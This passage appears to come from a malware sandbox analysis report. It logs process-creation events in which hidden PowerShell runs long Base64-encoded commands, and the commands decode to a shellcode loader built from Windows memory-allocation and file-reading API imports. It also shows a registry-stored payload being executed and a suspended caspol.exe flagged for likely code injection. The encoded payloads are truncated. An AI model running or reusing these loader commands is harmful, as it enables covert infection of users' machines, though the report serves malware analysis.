GMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAc Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAc Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kxeayl3s.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1FFF.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB9D447D8E2849BB9EF6D8A3F7C9ADB.TMP" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AG